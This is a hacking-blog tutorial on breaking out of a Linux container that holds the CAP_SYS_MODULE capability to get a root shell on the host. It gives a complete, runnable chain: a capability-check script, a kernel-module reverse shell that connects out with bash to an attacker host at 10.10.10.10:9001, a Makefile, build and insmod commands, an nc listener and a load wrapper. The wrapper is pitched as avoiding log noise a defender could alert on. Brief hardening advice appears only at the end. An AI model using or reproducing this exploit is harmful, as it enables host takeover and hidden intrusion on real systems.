Breaking Out of Containers - Exploiting Sys_Module Capability
2021-09-07 05:18:00 Author: www.hackingdream.net

Linux capabilities split the privileges of root into distinct units so that a binary or process (even one run by a non-root user) can perform one specific privileged operation without being granted full root. The kernel currently defines 41 of them (CAP_CHOWN through CAP_CHECKPOINT_RESTORE, numbered 0 to 40).

In this article we look at exploiting CAP_SYS_MODULE to gain a root shell on the host. CAP_SYS_MODULE permits the init_module/finit_module system calls, and a container shares the host's kernel, so a kernel module loaded from inside the container runs with ring-0 privilege in the host kernel, outside every namespace and cgroup the container is confined to.

#List the capabilities of the current process on the target machine
#If cap_sys_module appears in the Current (effective) set, the container is exploitable; having it only in the bounding set is not enough for insmod

capsh --print
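capsh is often absent from minimal container images, but the same information is in the CapEff line of /proc/self/status: a hexadecimal bitmask in which bit 16 is CAP_SYS_MODULE (capsh --decode=<hex> on the attacker machine prints the names). The script below, an added example that is not part of the original post, performs that check without capsh. The two sample status excerpts are constructed, using Docker's default mask 00000000a80425fb and the full mask 0000003fffffffff of a --privileged container on a 4.x kernel.

```shell
#!/bin/sh
# Added example (not from the original post): decide whether a process holds
# CAP_SYS_MODULE by reading the CapEff bitmask from /proc/<pid>/status instead
# of relying on capsh being installed in the container.

# Capability numbers from <linux/capability.h>; CAP_SYS_MODULE is bit 16.
CAP_SYS_MODULE=16
CAP_SYS_ADMIN=21

# cap_in_mask <capnum> <hexmask>: succeeds if the capability bit is set.
cap_in_mask() {
    [ $(( (0x$2 >> $1) & 1 )) -eq 1 ]
}

# capeff_from_status <file>: print the CapEff mask from a status file.
capeff_from_status() {
    awk '/^CapEff:/ { print $2 }' "$1"
}

# check_status <file>: exit 0 and report "exploitable" when CAP_SYS_MODULE
# is in the effective set, exit 1 otherwise.
check_status() {
    mask=$(capeff_from_status "$1")
    if cap_in_mask "$CAP_SYS_MODULE" "$mask"; then
        echo "exploitable (CapEff=$mask has CAP_SYS_MODULE)"
        return 0
    fi
    echo "not present (CapEff=$mask)"
    return 1
}

# Constructed sample status excerpts (not captured from a real host):
# Docker's default capability set, and a --privileged container on a 4.x kernel.
DOCKER_DEFAULT=$(mktemp)
PRIVILEGED=$(mktemp)
printf 'Name:\tbash\nCapInh:\t0000000000000000\nCapPrm:\t00000000a80425fb\nCapEff:\t00000000a80425fb\n' > "$DOCKER_DEFAULT"
printf 'Name:\tbash\nCapInh:\t0000000000000000\nCapPrm:\t0000003fffffffff\nCapEff:\t0000003fffffffff\n' > "$PRIVILEGED"

check_status "$DOCKER_DEFAULT" || true   # prints "not present ..."
check_status "$PRIVILEGED" || true       # prints "exploitable ..."
# On a live target: check_status /proc/self/status
```

The Docker default mask is what you get without --cap-add or --privileged; CAP_SYS_ADMIN (bit 21) is also absent from it, which is why the same check is worth running for other dangerous capabilities before choosing an escape route.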
Create a Reverse Shell Payload

#Save the code below as reverse-shell.c (the Makefile builds reverse-shell.o, so the name must match) and send it to the target machine
#include <linux/kmod.h>      /* call_usermodehelper() */
#include <linux/module.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");
/* Change 10.10.10.10:9001 to the attacker's listener. */
static char* argv[] = {"/bin/bash", "-c", "bash -i >& /dev/tcp/10.10.10.10/9001 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL};
/* Runs at insmod time. The kernel's usermode helper spawns /bin/bash as root in the
   host's initial namespaces, so the shell lands on the host, not in the container. */
static int __init reverse_shell_init(void) {
    return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}
static void __exit reverse_shell_exit(void) {
    printk(KERN_INFO "Exiting\n");
}
module_init(reverse_shell_init);
module_exit(reverse_shell_exit);
Create Makefile

#Save the file as Makefile and upload it to the target machine
#The two recipe lines under all: and clean: must be indented with a tab, not spaces, or make rejects the file

obj-m += reverse-shell.o
all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

Compile the files

#Make sure the compiler is on PATH (note the ':' separator before the gcc directory)
export PATH=$PATH:/usr/lib/gcc/x86_64-linux-gnu/10/
make clean
make all

or run the build explicitly (validate the kernel version with uname -r and the directory holding the source first):

make -C /lib/modules/4.15.0-142-generic/build M=/root clean
make -C /lib/modules/4.15.0-142-generic/build M=/root modules

The module must be compiled against the kernel that is actually running. A container shares the host kernel, so uname -r inside the container reports the host's release, and /lib/modules/$(uname -r)/build must contain the matching headers (package linux-headers-$(uname -r) on Debian/Ubuntu). If they cannot be installed in the container, build the module on a machine running the same kernel release and copy reverse-shell.ko over; a mismatch is rejected at load time with "Invalid module format".

#Start the listener on the attacker machine
nc -nvlp 9001

#Insert the kernel module on the target (requires CAP_SYS_MODULE; the module is loaded into the host kernel and shows up in lsmod on the host)
insmod reverse-shell.ko
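The build steps above assume the headers for the running kernel are in place and that the resulting .ko actually matches it. The script below, an added example that is not part of the original post, wraps the build with those checks: it confirms the kbuild tree exists, compares the module's vermagic (read with modinfo -F vermagic) against uname -r, and only then runs insmod. The hypothetical build_and_load function takes the source directory and module name; the vermagic strings at the bottom are constructed values for illustration, no build is performed by them.

```shell
#!/bin/sh
# Added example (not from the original post): build the module, verify it was
# built for the kernel that is actually running (the host kernel, since the
# container shares it), then load it. build_and_load is a hypothetical helper.

# vermagic_matches <vermagic string> <running release>: the first field of a
# module's vermagic is the kernel release it was compiled against.
vermagic_matches() {
    built_for=${1%% *}
    [ "$built_for" = "$2" ]
}

# headers_present <release>: the kbuild tree the Makefile's -C path needs.
headers_present() {
    [ -d "/lib/modules/$1/build" ]
}

# build_and_load <srcdir> <module name>: stops before insmod on any mismatch.
build_and_load() {
    srcdir=$1
    mod=$2
    release=$(uname -r)
    headers_present "$release" || {
        echo "no headers for $release: install linux-headers-$release or build on a host running the same release and copy the .ko" >&2
        return 1
    }
    make -C "/lib/modules/$release/build" M="$srcdir" modules || return 1
    magic=$(modinfo -F vermagic "$srcdir/$mod.ko")
    vermagic_matches "$magic" "$release" || {
        echo "vermagic '$magic' does not match running kernel $release; insmod would fail with 'Invalid module format'" >&2
        return 1
    }
    # The listener (nc -nvlp 9001) must already be running on the attacker host.
    insmod "$srcdir/$mod.ko"
}

# Constructed values to show the vermagic check (no build performed here):
vermagic_matches "4.15.0-142-generic SMP mod_unload modversions" "4.15.0-142-generic" && echo "vermagic ok"
vermagic_matches "5.4.0-81-generic SMP mod_unload modversions" "4.15.0-142-generic" || echo "vermagic mismatch"
# On a target: build_and_load /root reverse-shell
```

Checking vermagic before insmod saves a round trip: a rejected load leaves a "version magic ... should be ..." line in the host's dmesg, which is noise a defender can alert on, whereas the pre-check fails quietly inside the container.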

That is how you break out of a container by exploiting CAP_SYS_MODULE: the listener receives a root shell running on the host, because the usermode helper is spawned by the kernel in the initial namespaces rather than inside the container. When finished, rmmod reverse_shell (the loaded name uses an underscore) removes the module from the host kernel. On the defensive side, never grant SYS_MODULE (or --privileged, which includes it) to untrusted containers; on the host, sysctl kernel.modules_disabled=1 blocks all further module loading, and enforced module signing (CONFIG_MODULE_SIG_FORCE) rejects an unsigned module like this one.


Article source: https://www.hackingdream.net/2021/09/breaking-out-of-containers-exploiting-cap-sys-module.html